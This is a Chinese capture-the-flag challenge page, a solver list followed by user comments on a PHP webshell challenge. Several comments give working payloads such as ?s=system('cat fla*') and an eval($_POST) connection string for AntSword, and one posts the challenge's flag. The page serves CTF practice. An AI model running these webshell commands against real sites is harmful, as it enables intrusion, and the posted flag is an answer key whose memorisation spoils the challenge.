评分(10)
解题动态
jiandandian 攻破了该题 1天前
穹空丶悠远 攻破了该题 1天前
寒夜清风 攻破了该题 1天前
CD123456 攻破了该题 1天前
KamINanan 攻破了该题 2天前
xi24 攻破了该题 2天前
18171382569 攻破了该题 4天前
Jazz888 攻破了该题 5天前
雨季小朋友 攻破了该题 5天前
十里故清云 攻破了该题 6天前
gclome 攻破了该题 7天前
爆汁酸菜鱼 攻破了该题 7天前
潭影空人心 攻破了该题 7天前
2523822945 攻破了该题 7天前
qq1002517 攻破了该题 7天前
minakuu 攻破了该题 7天前
4n4n4n4n 攻破了该题 9天前
heart307 攻破了该题 10天前
15664977671 攻破了该题 10天前
评论
nihaozy 10月前
举报
有大哥是用蚁剑搞的吗,咋把一句话木马上传到对方网站咋连接的???在线求
wrdhv 9月前
举报
蚁剑url地址:url/?s=eval($_POST[1])然后连接密码是1
weiyouzhunze 10月前
举报
标题提示shell告诉我们要命令获取,描述上看得出的是assert($GET['s']),assert()应该不重要,只是判断是否执行正确,关注点是$GET['s'],注入参数s=system(ls),system()是命令执行函数,括号内为字符串,字符串被当作命令执行,这样就可以查看目录下的文件,有个flag的文件,要么执行cat 文件的命令,要么就直接在网站后面加/文件名
HK1ng 10月前
举报
根据描述就能看出已经上传了shell,让我们去利用即可,这里没有用菜刀连,直接手动构造,利用系统命令来实现s=system('ls'),然后可以看到当前目录有flaxxxxx,然后直接cat,s=system('cat fla*'),用一个模糊匹配。
zhwen 10月前
举报
简单PHP木马的利用,s=system("ls");
zfly 11月前
举报
?s=system('ls') ?s=system('cat fla*')
八一卜kod 12月前
举报
cat
freestyle 1年前
举报
s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容
000ooo 1年前
举报
?s=eval+($_POST['123'])
ruien 1年前
举报
答案就在描述里,上传的s参数如果是字符串会被当命令执行
112356 1年前
举报
flag{0aa5253236aa8d97368bd753cb3c4cf2}